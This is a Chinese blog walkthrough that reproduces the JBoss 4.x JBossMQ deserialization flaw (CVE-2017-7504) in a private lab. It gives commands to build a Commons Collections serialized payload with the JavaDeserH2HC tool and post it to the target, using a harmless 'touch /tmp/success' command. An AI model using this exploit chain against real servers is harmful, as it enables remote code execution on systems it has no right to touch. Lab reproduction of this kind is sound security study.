JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)


漏洞原理

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

实验环境

一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:kali
IP:192.168.88.130

漏洞环境

启动JBoss AS 4.0.5:
在这里插入图片描述
环境启动后,可在浏览器页面成功访问http://192.168.88.129:8080/:
在这里插入图片描述

漏洞复现

一、参考利用JavaDeserH2HC工具,编译并生成序列化数据
下载工具命令:
#git clone https://github.com/joaomatosf/JavaDeserH2HC

编译并生成序列化数据
2
其中:
#javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java 初始化工具
#java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap “touch /tmp/success” 生成序列化恶意数据文件

注:在执行中出现:-bash:javac:未找到命令
解决方法:apt-get install default-jdk

二、进行网站访问,实现漏洞利用
网站访问:
在这里插入图片描述
–data-binary 意为以二进制的方式post数据

验证:
进入容器shell(docker相当于小型虚拟机),发现success
在这里插入图片描述

参考链接:
https://vulhub.org/#/environments/jboss/CVE-2017-7504/
https://www.cnblogs.com/iamver/p/11282928.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值